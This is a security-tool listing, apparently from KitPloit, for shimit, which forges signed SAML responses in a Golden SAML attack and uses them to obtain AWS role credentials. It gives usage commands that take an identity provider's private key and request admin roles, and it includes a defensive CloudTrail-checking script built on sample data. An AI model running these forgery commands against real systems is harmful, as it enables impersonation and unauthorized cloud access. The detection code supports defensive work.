shimit - A tool that implements the Golden SAML attack

2018-01-06T20:45:30
ID KITPLOIT:3969207346105972899
Type kitploit
Reporter KitPloit
Modified 2018-01-06T20:45:30

Description

shimit is a Python tool that implements the Golden SAML attack. More information on this can be found in the following article on our blog.

python .\shimit.py -h
usage: shimit.py [-h] -pk KEY [-c CERT] [-sp SP] -idp IDP -u USER [-reg REGION]
                 [--SessionValidity SESSION_VALIDITY] [--SamlValidity SAML_VALIDITY] -n SESSION_NAME
                 -r ROLES -id ARN [-o OUT_FILE] [-l LOAD_FILE] [-t TIME]

              ██╗   ███████╗██╗  ██╗██╗███╗   ███╗██╗████████╗     ██╗ ██╗  
             ██╔╝   ██╔════╝██║  ██║██║████╗ ████║██║╚══██╔══╝    ██╔╝ ╚██╗ 
            ██╔╝    ███████╗███████║██║██╔████╔██║██║   ██║      ██╔╝   ╚██╗
            ╚██╗    ╚════██║██╔══██║██║██║╚██╔╝██║██║   ██║     ██╔╝    ██╔╝
             ╚██╗   ███████║██║  ██║██║██║ ╚═╝ ██║██║   ██║    ██╔╝    ██╔╝ 
              ╚═╝   ╚══════╝╚═╝  ╚═╝╚═╝╚═╝     ╚═╝╚═╝   ╚═╝    ╚═╝     ╚═╝

Overview
In a Golden SAML attack, an attacker can gain access to any application that supports SAML authentication, with any privileges they desire, as any user on the targeted application.
shimit allows the user to create a signed SAMLResponse object and use it to open a session in the Service Provider. shimit currently supports the AWS Console as a Service Provider; more are in the works...

AWS
After generating and signing the SAMLResponse's assertion, shimit calls the AssumeRoleWithSAML() API in AWS. The returned session token and keys are then applied to a new session, where the user can use the AWS CLI to perform actions with the permissions obtained through the Golden SAML.
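A defender-side check for the AssumeRoleWithSAML step described above, as an added example that is not part of shimit: it walks CloudTrail AssumeRoleWithSAML records and flags sessions whose assertion ID has no matching entry in the IdP's own issuance log (a signed assertion the IdP never produced is the core Golden SAML signal), whose issuer is not the trusted IdP, or whose requested duration exceeds policy. The CloudTrail records and the IdP issuance set are constructed sample data; the trusted issuer URL and duration limit are assumed policy values.

```python
TRUSTED_ISSUER = "http://adfs.lab.local/adfs/services/trust"   # assumed IdP entity ID
MAX_DURATION_SECONDS = 3600                                      # assumed session policy

# Constructed CloudTrail records, trimmed to the AssumeRoleWithSAML fields used here.
SAMPLE_CLOUDTRAIL = [
    {"eventName": "AssumeRoleWithSAML", "eventTime": "2018-01-06T20:45:30Z",
     "requestParameters": {"sAMLAssertionID": "_id-legit-0001",
                           "roleArn": "arn:aws:iam::123456789012:role/ADFS-monitor",
                           "durationSeconds": 3600},
     "responseElements": {"issuer": TRUSTED_ISSUER, "subject": "LAB\\jdoe"}},
    {"eventName": "AssumeRoleWithSAML", "eventTime": "2018-01-06T21:02:11Z",
     "requestParameters": {"sAMLAssertionID": "_id-never-issued",
                           "roleArn": "arn:aws:iam::123456789012:role/ADFS-admin",
                           "durationSeconds": 43200},
     "responseElements": {"issuer": TRUSTED_ISSUER, "subject": "LAB\\admin"}},
    {"eventName": "ConsoleLogin", "eventTime": "2018-01-06T21:05:00Z"},   # not SAML, skipped
]

# Constructed stand-in for the IdP's issuance log (e.g. ADFS audit events): the
# assertion IDs the IdP really signed. A forged assertion never appears here.
IDP_ISSUED_ASSERTION_IDS = {"_id-legit-0001"}


def review_saml_logins(events, issued_ids, trusted_issuer=TRUSTED_ISSUER,
                       max_duration=MAX_DURATION_SECONDS):
    """Return one finding per AssumeRoleWithSAML event that fails any check."""
    findings = []
    for ev in events:
        if ev.get("eventName") != "AssumeRoleWithSAML":
            continue
        req = ev.get("requestParameters", {})
        resp = ev.get("responseElements", {})
        reasons = []
        # Core Golden SAML signal: AWS accepted an assertion the IdP never logged.
        if req.get("sAMLAssertionID") not in issued_ids:
            reasons.append("assertion id absent from IdP issuance log")
        if resp.get("issuer") != trusted_issuer:
            reasons.append("issuer is not the trusted IdP")
        if req.get("durationSeconds", 0) > max_duration:
            reasons.append("requested duration exceeds policy")
        if reasons:
            findings.append({"time": ev["eventTime"], "subject": resp.get("subject"),
                             "role": req.get("roleArn"), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in review_saml_logins(SAMPLE_CLOUDTRAIL, IDP_ISSUED_ASSERTION_IDS):
        print(finding)
```

The forged session here passes the issuer check, since the forger signs as the trusted IdP; the correlation against the IdP's own log is what catches it.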

Requirements:
To install the required modules, run the following command:

python -m pip install boto3 botocore defusedxml enum python_dateutil lxml signxml

AWS cli
Needs to be installed in order to use the credentials obtained. It can be downloaded for Windows or Linux from these links.

Usage:

Apply session for AWS cli

python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file
-u domain\admin -n [email protected] -r ADFS-admin -r ADFS-monitor -id 123456789012

idp - Identity Provider URL, e.g. http://server.domain.com/adfs/services/trust
pk - Private key file full path (PEM format)
c - Certificate file full path (PEM format)
u - User and domain name, e.g. domain\username (escape the backslash or use quotes on *nix)
n - Session name in AWS
r - Desired roles in AWS. Supports multiple roles; the first one specified will be assumed.
id - AWS account ID, e.g. 123456789012

Save SAMLResponse to file

python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file
-u domain\admin -n [email protected] -r ADFS-admin -r ADFS-monitor -id 123456789012 -o saml_response.xml

o - Output encoded SAMLResponse to a specified file path

Load SAMLResponse from file

python .\shimit.py -l saml_response.xml

l - Load SAMLResponse from a specified file path

Contributions
shimit supports AWS as a service provider at the moment, as a POC. We highly encourage you to contribute new modules for other service providers.

Download shimit